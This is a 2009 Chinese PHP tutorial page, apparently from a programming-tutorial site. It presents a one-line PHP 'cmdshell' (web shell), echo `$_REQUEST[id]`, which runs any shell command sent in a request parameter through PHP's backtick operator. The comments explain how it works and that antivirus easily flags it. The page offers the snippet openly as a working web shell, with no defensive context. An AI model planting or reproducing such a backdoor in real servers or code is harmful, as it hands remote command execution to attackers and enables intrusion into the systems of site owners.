当前位置: 首页 > 图文教程 > 网络编程 > PHP > php一句话cmdshell新型 (非一句话木马)

PHP
一个多文件上传的例子(原创)
PHP的FTP学习(一)[转自奥索]
PHP - Html Transfer Code
新浪新闻小偷
一棵php的类树(支持无限分类)
PHP邮件专题
我常用的几个类
利用PHP创建动态图像
5.PHP的其他功能
用定制的PHP应用程序来获取Web服务器的状态信息
用PHP编写PDF文档生成器
一次编写,随处运行
PHP 中的一些经验积累
最小化数据传输:在客户端存储数据
综合图片计数器
模拟OICQ的实现思路和核心程序(一)
基于文本的留言簿
PHP的FTP学习(一)
杏林同学录(四)
我的论坛源代码(六)

PHP 中的 php一句话cmdshell新型 (非一句话木马)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 121 ::
收藏到网摘: n/a

php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
复制代码 代码如下:

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>